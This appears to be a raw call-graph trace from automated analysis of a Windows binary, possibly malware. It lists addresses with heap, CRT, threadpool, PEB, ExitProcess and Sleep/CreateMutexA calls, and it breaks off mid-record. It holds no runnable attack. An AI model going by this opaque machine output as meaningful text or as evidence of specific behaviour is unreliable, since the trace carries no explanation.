11425->11422 9728 f3a856 9729 f3a870 9728->9729 9736 f3a892 shared_ptr 9728->9736 9730 f3a94e 9729->9730 9729->9736 9731 f3a953 Sleep CreateMutexA 9730->9731 9752 f66c6a 9730->9752 9735 f3a98e 9731->9735 9734 f3a903 9737 f480c0 9736->9737 9738 f48104 9737->9738 9741 f480de 9737->9741 9739 f481ee 9738->9739 9743 f4817d 9738->9743 9744 f48158 9738->9744 9760 f49270 9739->9760 9741->9734 9742 f481f3 9763 f32480 9742->9763 9748 f4d3e2 RtlAllocateHeap 9743->9748 9749 f48169 __cftof 9743->9749 9744->9742 9755 f4d3e2 9744->9755 9748->9749 9750 f481d0 shared_ptr 9749->9750 9751 f66c6a RtlAllocateHeap 9749->9751 9750->9734 9751->9739 9753 f66bf6 __cftof RtlAllocateHeap 9752->9753 9754 f66c79 __cftof 9753->9754 9756 f32480 Concurrency::cancel_current_task __dosmaperr ___std_exception_copy 9755->9756 9759 f4d401 Concurrency::cancel_current_task 9756->9759 9767 f638af 9756->9767 9759->9749 9856 f4c1b9 9760->9856 9764 f3248e Concurrency::cancel_current_task 9763->9764 9765 f638af ___std_exception_copy RtlAllocateHeap 9764->9765 9766 f324c3 9765->9766 9768 f638bc ___std_exception_copy 9767->9768 9772 f324c3 9767->9772 9771 f638e9 9768->9771 9768->9772 9773 f6a1f1 9768->9773 9782 f68ba3 9771->9782 9772->9749 9774 f6a1fe 9773->9774 9775 f6a20c 9773->9775 9774->9775 9780 f6a223 9774->9780 9785 f675f6 9775->9785 9777 f6a214 9788 f66c5a 9777->9788 9779 f6a21e 9779->9771 9780->9779 9781 f675f6 __dosmaperr RtlAllocateHeap 9780->9781 9781->9777 9783 f6adf5 ___free_lconv_mon RtlAllocateHeap 9782->9783 9784 f68bbb 9783->9784 9784->9772 9791 f6a7c8 9785->9791 9850 f66bf6 9788->9850 9790 f66c66 9790->9779 9792 f6a7d2 __dosmaperr 9791->9792 9794 f675fb 9792->9794 9802 f6d82f 9792->9802 9794->9777 9795 f6a813 __dosmaperr 9796 f6a81b __dosmaperr 9795->9796 9797 f6a853 9795->9797 9806 f6adf5 9796->9806 9810 f6a49f 9797->9810 9801 f6adf5 ___free_lconv_mon RtlAllocateHeap 9801->9794 9805 f6d83c __dosmaperr 9802->9805 9803 f6d867 RtlAllocateHeap 9804 f6d87a __dosmaperr 9803->9804 9803->9805 9804->9795 9805->9803 9805->9804 9807 f6ae00 9806->9807 9809 f6ae1b __dosmaperr 9806->9809 9808 f675f6 __dosmaperr RtlAllocateHeap 9807->9808 9807->9809 9808->9809 9809->9794 9811 f6a50d __dosmaperr 9810->9811 9814 f6a445 9811->9814 9813 f6a536 9813->9801 9815 f6a451 __dosmaperr 9814->9815 9818 f6a626 9815->9818 9817 f6a473 __dosmaperr 9817->9813 9819 f6a635 __dosmaperr 9818->9819 9820 f6a65c __dosmaperr 9818->9820 9819->9820 9822 f6f35f 9819->9822 9820->9817 9824 f6f3df 9822->9824 9827 f6f375 9822->9827 9823 f6f4d0 __dosmaperr RtlAllocateHeap 9847 f6f43b 9823->9847 9825 f6adf5 ___free_lconv_mon RtlAllocateHeap 9824->9825 9848 f6f42d 9824->9848 9826 f6f401 9825->9826 9830 f6adf5 ___free_lconv_mon RtlAllocateHeap 9826->9830 9827->9824 9828 f6f3a8 9827->9828 9832 f6adf5 ___free_lconv_mon RtlAllocateHeap 9827->9832 9829 f6f3ca 9828->9829 9834 f6adf5 ___free_lconv_mon RtlAllocateHeap 9828->9834 9831 f6adf5 ___free_lconv_mon RtlAllocateHeap 9829->9831 9833 f6f414 9830->9833 9836 f6f3d4 9831->9836 9838 f6f39d 9832->9838 9835 f6adf5 ___free_lconv_mon RtlAllocateHeap 9833->9835 9839 f6f3bf 9834->9839 9840 f6f422 9835->9840 9841 f6adf5 ___free_lconv_mon RtlAllocateHeap 9836->9841 9837 f6f49b 9842 f6adf5 ___free_lconv_mon RtlAllocateHeap 9837->9842 9843 f6ef3c ___free_lconv_mon RtlAllocateHeap 9838->9843 9844 f6f03a __dosmaperr RtlAllocateHeap 9839->9844 9845 f6adf5 ___free_lconv_mon RtlAllocateHeap 9840->9845 9841->9824 9846 f6f4a1 9842->9846 9843->9828 9844->9829 9845->9848 9846->9820 9847->9837 9849 f6adf5 RtlAllocateHeap ___free_lconv_mon 9847->9849 9848->9823 9849->9847 9851 f6a7c8 __dosmaperr RtlAllocateHeap 9850->9851 9852 f66c01 __cftof 9851->9852 9853 f66c0f 9852->9853 9854 f66bf6 __cftof RtlAllocateHeap 9852->9854 9853->9790 9855 f66c66 9854->9855 9855->9790 9859 f4c123 9856->9859 9858 f4c1ca Concurrency::cancel_current_task 9862 f322e0 9859->9862 9861 f4c135 9861->9858 9863 f638af ___std_exception_copy RtlAllocateHeap 9862->9863 9864 f32317 __floor_pentium4 9863->9864 9864->9861 11426 f66a44 11427 f66a52 11426->11427 11428 f66a5c 11426->11428 11439 f6b655 11427->11439 11444 f6698d 11428->11444 11431 f66a76 11447 f668ed 11431->11447 11432 f66a59 11435 f66a8a 11437 f6adf5 ___free_lconv_mon RtlAllocateHeap 11435->11437 11438 f66aa8 11435->11438 11436 f6b655 RtlAllocateHeap 11436->11435 11437->11438 11440 f6b662 11439->11440 11441 f6b679 11440->11441 11450 f675c0 11440->11450 11441->11432 11445 f6690a __cftof 4 API calls 11444->11445 11446 f6699f 11445->11446 11446->11431 11458 f6683b 11447->11458 11455 f675e3 11450->11455 11452 f675cb __dosmaperr 11453 f675f6 __dosmaperr RtlAllocateHeap 11452->11453 11454 f675de 11453->11454 11454->11432 11456 f6a7c8 __dosmaperr RtlAllocateHeap 11455->11456 11457 f675e8 11456->11457 11457->11452 11459 f66863 11458->11459 11460 f66849 11458->11460 11462 f6686a 11459->11462 11465 f66889 __cftof 11459->11465 11471 f669cc 11460->11471 11463 f66853 11462->11463 11475 f669e6 11462->11475 11463->11435 11463->11436 11466 f669e6 RtlAllocateHeap 11465->11466 11467 f6689f __cftof 11465->11467 11466->11467 11467->11463 11468 f675c0 __dosmaperr RtlAllocateHeap 11467->11468 11469 f668ab 11468->11469 11470 f675f6 __dosmaperr RtlAllocateHeap 11469->11470 11470->11463 11472 f669d7 11471->11472 11474 f669df 11471->11474 11473 f6adf5 ___free_lconv_mon RtlAllocateHeap 11472->11473 11473->11474 11474->11463 11476 f669cc RtlAllocateHeap 11475->11476 11477 f669f4 11476->11477 11480 f66a25 11477->11480 11481 f6b04b __cftof RtlAllocateHeap 11480->11481 11482 f66a05 11481->11482 11482->11463 11526 f33440 11531 f32b30 11526->11531 11528 f3344f Concurrency::cancel_current_task 11529 f638af ___std_exception_copy RtlAllocateHeap 11528->11529 11530 f33483 11529->11530 11532 f638af ___std_exception_copy RtlAllocateHeap 11531->11532 11533 f32b68 __floor_pentium4 11532->11533 11533->11528 11534 f33840 11535 f3385f 11534->11535 11542 f338f6 11534->11542 11536 f33920 11535->11536 11538 f338cd shared_ptr 11535->11538 11541 f3391b 11535->11541 11535->11542 11544 f491e0 11536->11544 11540 f47d50 RtlAllocateHeap 11538->11540 11539 f33925 11540->11542 11543 f66c6a RtlAllocateHeap 11541->11543 11543->11536 11545 f4c1b9 RtlAllocateHeap 11544->11545 11546 f491ea 11545->11546 11546->11539 11547 f33c47 11548 f33c51 11547->11548 11550 f332d0 6 API calls 11548->11550 11551 f33c5f 11548->11551 11549 f33c68 11550->11551 11551->11549 11552 f33810 4 API calls 11551->11552 11553 f33cdb 11552->11553 11554 f47d50 RtlAllocateHeap 11553->11554 11555 f33d52 11553->11555 11554->11555 11556 f4d3e2 RtlAllocateHeap 11555->11556 11557 f33d84 11556->11557 11558 f47d50 RtlAllocateHeap 11557->11558 11560 f33e03 11557->11560 11558->11560 11559 f33e9b shared_ptr 11560->11559 11561 f66c6a RtlAllocateHeap 11560->11561 11562 f33ec1 11561->11562 11581 f31020 11582 f480c0 RtlAllocateHeap 11581->11582 11583 f31031 11582->11583 11584 f4d64e RtlAllocateHeap 11583->11584 11585 f3103b 11584->11585 9876 f66629 9879 f664c7 9876->9879 9880 f664d5 __cftof 9879->9880 9881 f66520 9880->9881 9884 f6652b 9880->9884 9883 f6652a 9890 f6a302 GetPEB 9884->9890 9886 f66535 9887 f6653a GetPEB 9886->9887 9889 f6654a __cftof 9886->9889 9887->9889 9888 f66562 ExitProcess 9889->9888 9891 f6a31c __cftof 9890->9891 9891->9886 11615 f3a418 11616 f3a420 shared_ptr 11615->11616 11617 f3a4f3 shared_ptr 11616->11617 11618 f3a93f 11616->11618 11621 f480c0 RtlAllocateHeap 11617->11621 11619 f66c6a RtlAllocateHeap 11618->11619 11620 f3a944 11619->11620 11622 f66c6a RtlAllocateHeap 11620->11622 11623 f3a903 11621->11623 11624 f3a949 11622->11624 11625 f3a94e 11624->11625 11626 f66c6a RtlAllocateHeap 11624->11626 11627 f3a953 Sleep CreateMutexA 11625->11627 11628 f66c6a RtlAllocateHeap 11625->11628 11626->11625 11629 f3a98e 11627->11629 11628->11627 11635 f31000 11636 f4d64e RtlAllocateHeap 11635->11636 11637 f3100a 11636->11637 11643 f32e00 11644 f32e28 11643->11644 11645 f4c68b __Mtx_init_in_situ 2 API calls 11644->11645 11646 f32e33 11645->11646 11677 f355f0 11678 f35610 11677->11678 11679 f322c0 4 API calls 11678->11679 11680 f35710 __floor_pentium4 11678->11680 11679->11678 11681 f343f0 11682 f4bedf InitOnceExecuteOnce 11681->11682 11683 f3440a 11682->11683 11684 f34411 11683->11684 11685 f66cbb 4 API calls 11683->11685 11686 f34424 11685->11686 11727 f33fe0 11728 f34022 11727->11728 11729 f340d2 11728->11729 11730 f3408c 11728->11730 11733 f34035 __floor_pentium4 11728->11733 11745 f33ee0 11729->11745 11734 f335e0 11730->11734 11735 f4d3e2 RtlAllocateHeap 11734->11735 11736 f33616 11735->11736 11737 f33691 11736->11737 11738 f3364e 11736->11738 11751 f32ce0 11737->11751 11740 f4c17c Concurrency::cancel_current_task RtlAllocateHeap 11738->11740 11744 f33663 shared_ptr __floor_pentium4 11738->11744 11742 f33720 11740->11742 11741 f3369e 11741->11744 11760 f32c00 11741->11760 11742->11733 11744->11733 11746 f33f48 11745->11746 11747 f33f1e 11745->11747 11748 f33f58 11746->11748 11749 f32c00 4 API calls 11746->11749 11747->11733 11748->11733 11750 f33f7f 11749->11750 11750->11733 11752 f32d1d 11751->11752 11753 f4bedf InitOnceExecuteOnce 11752->11753 11754 f32d46 11753->11754 11755 f32d51 __floor_pentium4 11754->11755 11757 f32d88 11754->11757 11770 f4bef7 11754->11770 11755->11741 11758 f32440 4 API calls 11757->11758 11759 f32d9b 11758->11759 11759->11741 11761 f4d3e2 RtlAllocateHeap 11760->11761 11762 f32c0e 11761->11762 11795 f4b847 11762->11795 11764 f32c42 11765 f32c49 11764->11765 11801 f32c80 11764->11801 11765->11744 11767 f32c58 11804 f32560 11767->11804 11769 f32c65 Concurrency::cancel_current_task 11771 f4bf03 11770->11771 11779 f32900 11771->11779 11773 f4bf23 Concurrency::cancel_current_task 11774 f4bf73 11773->11774 11775 f4bf6a 11773->11775 11777 f32ae0 5 API calls 11774->11777 11789 f4be7f 11775->11789 11778 f4bf6f 11777->11778 11778->11757 11780 f480c0 RtlAllocateHeap 11779->11780 11781 f3294f 11780->11781 11782 f326b0 RtlAllocateHeap 11781->11782 11783 f32967 11782->11783 11784 f3298d shared_ptr 11783->11784 11785 f66c6a RtlAllocateHeap 11783->11785 11784->11773 11786 f329b6 11785->11786 11787 f638af ___std_exception_copy RtlAllocateHeap 11786->11787 11788 f329e4 11787->11788 11788->11773 11790 f4cc31 InitOnceExecuteOnce 11789->11790 11791 f4be97 11790->11791 11792 f4be9e 11791->11792 11793 f66cbb 4 API calls 11791->11793 11792->11778 11794 f4bea7 11793->11794 11794->11778 11796 f4b854 11795->11796 11800 f4b873 Concurrency::details::_Reschedule_chore 11795->11800 11807 f4cb77 11796->11807 11798 f4b864 11798->11800 11809 f4b81e 11798->11809 11800->11764 11815 f4b7fb 11801->11815 11803 f32cb2 shared_ptr 11803->11767 11805 f638af ___std_exception_copy RtlAllocateHeap 11804->11805 11806 f32597 __floor_pentium4 11805->11806 11806->11769 11808 f4cb92 CreateThreadpoolWork 11807->11808 11808->11798 11810 f4b827 Concurrency::details::_Reschedule_chore 11809->11810 11813 f4cdcc 11810->11813 11812 f4b841 11812->11800 11814 f4cde1 TpPostWork 11813->11814 11814->11812 11816 f4b807 11815->11816 11817 f4b817 11815->11817 11816->11817 11819 f4ca78 11816->11819 11817->11803 11820 f4ca8d TpReleaseWork 11819->11820 11820->11817 11821 f485e0 11822 f485f6 11821->11822 11822->11822 11823 f4860b 11822->11823 11824 f48f40 RtlAllocateHeap 11822->11824 11824->11823 11825 f48de0 11826 f48e05 11825->11826 11827 f48f2f 11825->11827 11831 f48e76 11826->11831 11832 f48e4c 11826->11832 11828 f49270 RtlAllocateHeap 11827->11828 11829 f48f34 11828->11829 11830 f32480 RtlAllocateHeap 11829->11830 11838 f48e5d __cftof 11830->11838 11836 f4d3e2 RtlAllocateHeap 11831->11836 11831->11838 11832->11829 11833 f48e57 11832->11833 11835 f4d3e2 RtlAllocateHeap 11833->11835 11834 f66c6a RtlAllocateHeap 11837 f48f3e 11834->11837 11835->11838 11836->11838 11838->11834 11839 f48eed shared_ptr __cftof 11838->11839 11840 f387d0 11841 f388d3 11840->11841 11849 f38819 shared_ptr 11840->11849 11842 f480c0 RtlAllocateHeap 11841->11842 11848 f38923 11842->11848 11843 f3896c 11846 f48200 RtlAllocateHeap 11843->11846 11844 f38949 shared_ptr 11845 f480c0 RtlAllocateHeap 11845->11849 11847 f38971 11846->11847 11848->11844 11850 f66c6a RtlAllocateHeap 11848->11850 11849->11841 11849->11843 11849->11845 11849->11848 11850->11843 11860 f321c0 11861 f321d0 11860->11861 11862 f321cb 11860->11862 11863 f321d4 11861->11863 11868 f321ec __cftof 11861->11868 11864 f675f6 __dosmaperr RtlAllocateHeap 11863->11864 11865 f321d9 11864->11865 11867 f66c5a __cftof RtlAllocateHeap 11865->11867 11866 f321fc __cftof 11869 f321e4 11867->11869 11868->11866 11870 f32221 11868->11870 11871 f3223a 11868->11871 11873 f675f6 __dosmaperr RtlAllocateHeap 11870->11873 11872 f32231 11871->11872 11874 f675f6 __dosmaperr RtlAllocateHeap 11871->11874 11875 f32226 11873->11875 11877 f32247 11874->11877 11876 f66c5a __cftof RtlAllocateHeap 11875->11876 11876->11872 11878 f66c5a __cftof RtlAllocateHeap 11877->11878 11879 f32252 11878->11879 11918 f479c0 11919 f479e0 11918->11919 11919->11919 11920 f480c0 RtlAllocateHeap 11919->11920 11921 f479f2 11920->11921 11922 f483c0 11923 f47760 RtlAllocateHeap 11922->11923 11924 f48439 11923->11924 11925 f48f40 RtlAllocateHeap 11924->11925 11926 f48454 11924->11926 11925->11926 11927 f48f40 RtlAllocateHeap 11926->11927 11929 f484a8 11926->11929 11928 f484ee 11927->11928 9865 f6a7c8 9866 f6a7d2 __dosmaperr 9865->9866 9867 f6d82f __dosmaperr RtlAllocateHeap 9866->9867 9868 f6a7eb 9866->9868 9869 f6a813 __dosmaperr 9867->9869 9870 f6a81b __dosmaperr 9869->9870 9871 f6a853 9869->9871 9872 f6adf5 ___free_lconv_mon RtlAllocateHeap 9870->9872 9873 f6a49f __dosmaperr RtlAllocateHeap 9871->9873 9872->9868 9874 f6a85e 9873->9874 9875 f6adf5 ___free_lconv_mon RtlAllocateHeap 9874->9875 9875->9868 11930 f667b7 11931 f667c3 __dosmaperr 11930->11931 11932 f667cd 11931->11932 11935 f667e2 11931->11935 11933 f675f6 __dosmaperr RtlAllocateHeap 11932->11933 11934 f667d2 11933->11934 11936 f66c5a __cftof RtlAllocateHeap 11934->11936 11937 f667dd 11935->11937 11939 f66740 11935->11939 11936->11937 11940 f66762 11939->11940 11941 f6674d 11939->11941 11947 f6675d 11940->11947 11955 f6a038 11940->11955 11942 f675f6 __dosmaperr RtlAllocateHeap 11941->11942 11943 f66752 11942->11943 11945 f66c5a __cftof RtlAllocateHeap 11943->11945 11945->11947 11947->11937 11951 f66785 11972 f6aebb 11951->11972 11954 f6adf5 ___free_lconv_mon RtlAllocateHeap 11954->11947 11956 f6a050 11955->11956 11960 f66777 11955->11960 11957 f6afe4 RtlAllocateHeap 11956->11957 11956->11960 11958 f6a06e 11957->11958 11987 f70439 11958->11987 11961 f6b00b 11960->11961 11962 f6677f 11961->11962 11963 f6b022 11961->11963 11965 f6afe4 11962->11965 11963->11962 11964 f6adf5 ___free_lconv_mon RtlAllocateHeap 11963->11964 11964->11962 11966 f6b005 11965->11966 11967 f6aff0 11965->11967 11966->11951 11968 f675f6 __dosmaperr RtlAllocateHeap 11967->11968 11969 f6aff5 11968->11969 11970 f66c5a __cftof RtlAllocateHeap 11969->11970 11971 f6b000 11970->11971 11971->11951 11973 f6aee1 11972->11973 11974 f6aecc 11972->11974 11976 f6af2a 11973->11976 11979 f6af08 11973->11979 11975 f675e3 __dosmaperr RtlAllocateHeap 11974->11975 11978 f6aed1 11975->11978 11977 f675e3 __dosmaperr RtlAllocateHeap 11976->11977 11980 f6af2f 11977->11980 11981 f675f6 __dosmaperr RtlAllocateHeap 11978->11981 12005 f6ae2f 11979->12005 11983 f675f6 __dosmaperr RtlAllocateHeap 11980->11983 11984 f6678b 11981->11984 11985 f6af37 11983->11985 11984->11947 11984->11954 11986 f66c5a __cftof RtlAllocateHeap 11985->11986 11986->11984 11988 f70445 __dosmaperr 11987->11988 11989 f7044d 11988->11989 11994 f70465 11988->11994 11991 f675e3 __dosmaperr RtlAllocateHeap 11989->11991 11990 f70500 11993 f675e3 __dosmaperr RtlAllocateHeap 11990->11993 11992 f70452 11991->11992 11995 f675f6 __dosmaperr RtlAllocateHeap 11992->11995 11996 f70505 11993->11996 11994->11990 12000 f70497 11994->12000 12003 f7045a 11995->12003 11997 f675f6 __dosmaperr RtlAllocateHeap 11996->11997 11998 f7050d 11997->11998 11999 f66c5a __cftof RtlAllocateHeap 11998->11999 11999->12003 12001 f675f6 __dosmaperr RtlAllocateHeap 12000->12001 12000->12003 12002 f704be 12001->12002 12004 f675e3 __dosmaperr RtlAllocateHeap 12002->12004 12003->11960 12004->12003 12006 f6ae3b __dosmaperr 12005->12006 12007 f6ae70 12006->12007 12008 f6ae7b 12006->12008 12012 f6af48 12007->12012 12010 f675f6 __dosmaperr RtlAllocateHeap 12008->12010 12011 f6ae76 12010->12011 12011->11984 12023 f6c0de 12012->12023 12014 f6af5e 12019 f675c0 __dosmaperr RtlAllocateHeap 12014->12019 12021 f6afd8 12014->12021 12015 f6af58 12015->12014 12017 f6c0de RtlAllocateHeap 12015->12017 12022 f6af90 12015->12022 12016 f6c0de RtlAllocateHeap 12016->12014 12018 f6af87 12017->12018 12020 f6c0de RtlAllocateHeap 12018->12020 12019->12021 12020->12022 12021->12011 12022->12014 12022->12016 12024 f6c100 12023->12024 12025 f6c0eb 12023->12025 12028 f675e3 __dosmaperr RtlAllocateHeap 12024->12028 12031 f6c125 12024->12031 12026 f675e3 __dosmaperr RtlAllocateHeap 12025->12026 12027 f6c0f0 12026->12027 12030 f675f6 __dosmaperr RtlAllocateHeap 12027->12030 12029 f6c130 12028->12029 12032 f675f6 __dosmaperr RtlAllocateHeap 12029->12032 12034 f6c0f8 12030->12034 12031->12015 12033 f6c138 12032->12033 12035 f66c5a __cftof RtlAllocateHeap 12033->12035 12034->12015 12035->12034 12036 f3b7b1 12039 f3b7be 12036->12039 12037 f47a00 RtlAllocateHeap 12038 f3b7f3 12037->12038 12040 f47a00 RtlAllocateHeap 12038->12040 12039->12037 12041 f3b80b 12040->12041 12042 f47a00 RtlAllocateHeap 12041->12042 12043 f3b823 12042->12043 12044 f47a00 RtlAllocateHeap 12043->12044 12045 f3b835 12044->12045 12050 f36db5 12051 f36dc2 12050->12051 12052 f36df5 12051->12052 12053 f36dca 12051->12053 12055 f480c0 RtlAllocateHeap 12052->12055 12054 f480c0 RtlAllocateHeap 12053->12054 12056 f36deb shared_ptr 12054->12056 12055->12056 12057 f36ec1 shared_ptr 12056->12057 12058 f66c6a RtlAllocateHeap 12056->12058 12059 f36ee3 12058->12059 12060 f68bbe 12061 f68868 4 API calls 12060->12061 12062 f68bdc 12061->12062 12103 f39ba5 12104 f39ba7 12103->12104 12105 f47a00 RtlAllocateHeap 12104->12105 12106 f39ca9 12105->12106 12107 f35c10 4 API calls 12106->12107 12108 f39cb1 12107->12108 12109 f38b30 4 API calls 12108->12109 12110 f39cc2 12109->12110 12111 f48220 RtlAllocateHeap 12110->12111 12112 f39cd1 12111->12112 12125 f32b90 12126 f32bce 12125->12126 12127 f4b7fb TpReleaseWork 12126->12127 12128 f32bdb shared_ptr __floor_pentium4 12127->12128 12129 f33f9f 12130 f33fc5 12129->12130 12131 f33fad 12129->12131 12132 f32410 5 API calls 12131->12132 12133 f33fb6 12132->12133 12134 f33ce0 RtlAllocateHeap 12133->12134 12134->12130 12150 f38980 12151 f38aea 12150->12151 12158 f389d8 shared_ptr 12150->12158 12152 f47a00 RtlAllocateHeap 12152->12158 12153 f35c10 4 API calls 12153->12158 12154 f38b20 12156 f48200 RtlAllocateHeap 12154->12156 12155 f480c0 RtlAllocateHeap 12155->12158 12157 f38b25 12156->12157 12159 f66c6a RtlAllocateHeap 12157->12159 12158->12151 12158->12152 12158->12153 12158->12154 12158->12155 12158->12157 12160 f38b2a 12159->12160 12189 f32170 12194 f4c6fc 12189->12194 12192 f4d64e RtlAllocateHeap 12193 f32184 12192->12193 12195 f3217a 12194->12195 12196 f4c70c 12194->12196 12195->12192 12196->12195 12198 f4cfbe 12196->12198 12199 f4ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12198->12199 12200 f4cfd0 12199->12200 12200->12196 12201 f33970 12202 f4c68b __Mtx_init_in_situ 2 API calls 12201->12202 12203 f339a7 12202->12203 12204 f4c68b __Mtx_init_in_situ 2 API calls 12203->12204 12205 f339e6 12204->12205 12206 f33770 12207 f3379b 12206->12207 12208 f337cd shared_ptr 12207->12208 12209 f66c6a RtlAllocateHeap 12207->12209 12210 f3380f 12209->12210 12211 f35f76 12212 f35f81 shared_ptr 12211->12212 12213 f35ffe shared_ptr __floor_pentium4 12212->12213 12214 f66c6a RtlAllocateHeap 12212->12214 12215 f3601b 12214->12215 12216 f480c0 RtlAllocateHeap 12215->12216 12217 f36089 12216->12217 12218 f480c0 RtlAllocateHeap 12217->12218 12219 f360bd 12218->12219 12220 f480c0 RtlAllocateHeap 12219->12220 12221 f360ee 12220->12221 12222 f480c0 RtlAllocateHeap 12221->12222 12223 f3611f 12222->12223 12224 f480c0 RtlAllocateHeap 12223->12224 12226 f36150 12224->12226 12225 f365b1 shared_ptr __floor_pentium4 12226->12225 12227 f66c6a RtlAllocateHeap 12226->12227 12228 f365dc 12227->12228 12229 f47a00 RtlAllocateHeap 12228->12229 12230 f366a6 12229->12230 12231 f35c10 4 API calls 12230->12231 12232 f366ac 12231->12232 12233 f35c10 4 API calls 12232->12233 12234 f366b1 12233->12234 12235 f322c0 4 API calls 12234->12235 12236 f366c9 shared_ptr 12235->12236 12237 f47a00 RtlAllocateHeap 12236->12237 12238 f36732 12237->12238 12239 f35c10 4 API calls 12238->12239 12240 f3673d 12239->12240 12241 f322c0 4 API calls 12240->12241 12250 f36757 shared_ptr 12241->12250 12242 f36852 12243 f480c0 RtlAllocateHeap 12242->12243 12245 f3689c 12243->12245 12244 f47a00 RtlAllocateHeap 12244->12250 12246 f480c0 RtlAllocateHeap 12245->12246 12249 f368e3 shared_ptr __floor_pentium4 12246->12249 12247 f35c10 4 API calls 12247->12250 12248 f322c0 4 API calls 12248->12250 12250->12242 12250->12244 12250->12247 12250->12248 12294 f3215a 12295 f4c6fc InitializeCriticalSectionEx 12294->12295 12296 f32164 12295->12296 12297 f4d64e RtlAllocateHeap 12296->12297 12298 f3216e 12297->12298 12339 f39f44 12340 f39f4c shared_ptr 12339->12340 12341 f3a01f shared_ptr 12340->12341 12342 f3a92b 12340->12342 12345 f480c0 RtlAllocateHeap 12341->12345 12343 f3a953 Sleep CreateMutexA 12342->12343 12344 f66c6a RtlAllocateHeap 12342->12344 12346 f3a98e 12343->12346 12344->12343 12347 f3a903 12345->12347 12360 f3a54d 12361 f3a555 shared_ptr 12360->12361 12362 f3a944 12361->12362 12364 f3a628 shared_ptr 12361->12364 12363 f66c6a RtlAllocateHeap 12362->12363 12365 f3a949 12363->12365 12366 f480c0 RtlAllocateHeap 12364->12366 12367 f3a94e 12365->12367 12368 f66c6a RtlAllocateHeap 12365->12368 12371 f3a903 12366->12371 12369 f3a953 Sleep CreateMutexA 12367->12369 12370 f66c6a RtlAllocateHeap 12367->12370 12368->12367 12372 f3a98e 12369->12372 12370->12369 12376 f36535 12377 f36549 shared_ptr 12376->12377 12378 f66c6a RtlAllocateHeap 12377->12378 12379 f365b1 shared_ptr __floor_pentium4 12377->12379 12380 f365dc 12378->12380 12381 f47a00 RtlAllocateHeap 12380->12381 12382 f366a6 12381->12382 12383 f35c10 4 API calls 12382->12383 12384 f366ac 12383->12384 12385 f35c10 4 API calls 12384->12385 12386 f366b1 12385->12386 12387 f322c0 4 API calls 12386->12387 12388 f366c9 shared_ptr 12387->12388 12389 f47a00 RtlAllocateHeap 12388->12389 12390 f36732 12389->12390 12391 f35c10 4 API calls 12390->12391 12392 f3673d 12391->12392 12393 f322c0 4 API calls 12392->12393 12394 f36757 shared_ptr 12393->12394 12395 f36852 12394->12395 12397 f47a00 RtlAllocateHeap 12394->12397 12400 f35c10 4 API calls 12394->12400 12401 f322c0 4 API calls 12394->12401 12396 f480c0 RtlAllocateHeap 12395->12396 12398 f3689c 12396->12398 12397->12394 12399 f480c0 RtlAllocateHeap 12398->12399 12402 f368e3 shared_ptr __floor_pentium4 12399->12402 12400->12394 12401->12394 12413 f34120 12414 f3416a 12413->12414 12415 f341a6 12414->12415 12418 f341f6 12414->12418 12416 f33ee0 4 API calls 12415->12416 12419 f341b2 __floor_pentium4 12416->12419 12420 f4b6be 12418->12420 12421 f4b6ca 12420->12421 12424 f475a0 12421->12424 12425 f475ab Concurrency::cancel_current_task 12424->12425 12426 f4c0e9 std::invalid_argument::invalid_argument RtlAllocateHeap 12425->12426 12427 f4c1aa Concurrency::cancel_current_task 12426->12427 12463 f48320 12464 f48339 12463->12464 12465 f4834d 12464->12465 12466 f48f40 RtlAllocateHeap 12464->12466 12466->12465 12467 f66729 12470 f66672 12467->12470 12469 f6673b 12473 f6667e __dosmaperr 12470->12473 12471 f66685 12472 f675f6 __dosmaperr RtlAllocateHeap 12471->12472 12474 f6668a 12472->12474 12473->12471 12475 f666a5 12473->12475 12476 f66c5a __cftof RtlAllocateHeap 12474->12476 12477 f666b7 12475->12477 12478 f666aa 12475->12478 12479 f66695 12476->12479 12484 f6a8c3 12477->12484 12480 f675f6 __dosmaperr RtlAllocateHeap 12478->12480 12479->12469 12480->12479 12482 f666c0 12482->12479 12483 f675f6 __dosmaperr RtlAllocateHeap 12482->12483 12483->12479 12485 f6a8cf __dosmaperr 12484->12485 12488 f6a967 12485->12488 12487 f6a8ea 12487->12482 12492 f6a98a 12488->12492 12489 f6d82f __dosmaperr RtlAllocateHeap 12490 f6a9eb 12489->12490 12491 f6adf5 ___free_lconv_mon RtlAllocateHeap 12490->12491 12493 f6a9d0 12491->12493 12492->12489 12492->12492 12492->12493 12493->12487 12497 f32b10 12498 f32b1a 12497->12498 12499 f32b1c 12497->12499 12500 f4c26a 5 API calls 12499->12500 12501 f32b22 12500->12501 12502 f48510 12503 f4855f 12502->12503 12506 f4856c 12502->12506 12508 f49d00 12503->12508 12505 f485c4 12506->12505 12529 f4a060 12506->12529 12509 f49e31 12508->12509 12512 f49d25 12508->12512 12510 f49270 RtlAllocateHeap 12509->12510 12521 f49d8b __cftof 12510->12521 12511 f66c6a RtlAllocateHeap 12520 f49e3b 12511->12520 12513 f49e2c 12512->12513 12514 f49da1 12512->12514 12515 f49d7a 12512->12515 12516 f32480 RtlAllocateHeap 12513->12516 12519 f4d3e2 RtlAllocateHeap 12514->12519 12514->12521 12515->12513 12517 f49d85 12515->12517 12516->12509 12518 f4d3e2 RtlAllocateHeap 12517->12518 12518->12521 12519->12521 12522 f49e6a shared_ptr 12520->12522 12523 f66c6a RtlAllocateHeap 12520->12523 12521->12511 12524 f49dfc shared_ptr __cftof 12521->12524 12522->12506 12525 f49e8e 12523->12525 12524->12506 12526 f49ec0 shared_ptr 12525->12526 12527 f66c6a RtlAllocateHeap 12525->12527 12526->12506 12528 f49ee6 12527->12528 12530 f4a1b1 12529->12530 12534 f4a083 12529->12534 12531 f49270 RtlAllocateHeap 12530->12531 12542 f4a0e4 __cftof 12531->12542 12532 f66c6a RtlAllocateHeap 12541 f4a1bb shared_ptr 12532->12541 12533 f4a1ac 12535 f32480 RtlAllocateHeap 12533->12535 12534->12533 12536 f4a0d3 12534->12536 12537 f4a0fd 12534->12537 12535->12530 12536->12533 12538 f4a0de 12536->12538 12539 f4d3e2 RtlAllocateHeap 12537->12539 12537->12542 12540 f4d3e2 RtlAllocateHeap 12538->12540 12539->12542 12540->12542 12541->12506 12542->12532 12543 f4a16c shared_ptr __cftof 12542->12543 12543->12506 12544 f4d111 12546 f4d121 12544->12546 12545 f4d12a 12546->12545 12548 f4d199 12546->12548 12549 f4d1a7 SleepConditionVariableCS 12548->12549 12551 f4d1c0 12548->12551 12549->12551 12551->12546 12552 f3211c 12553 f32126 12552->12553 12554 f4d64e RtlAllocateHeap 12553->12554 12555 f32132 12554->12555 12574 f34300 12575 f3432e 12574->12575 12578 f34359 shared_ptr 12574->12578 12576 f66c6a 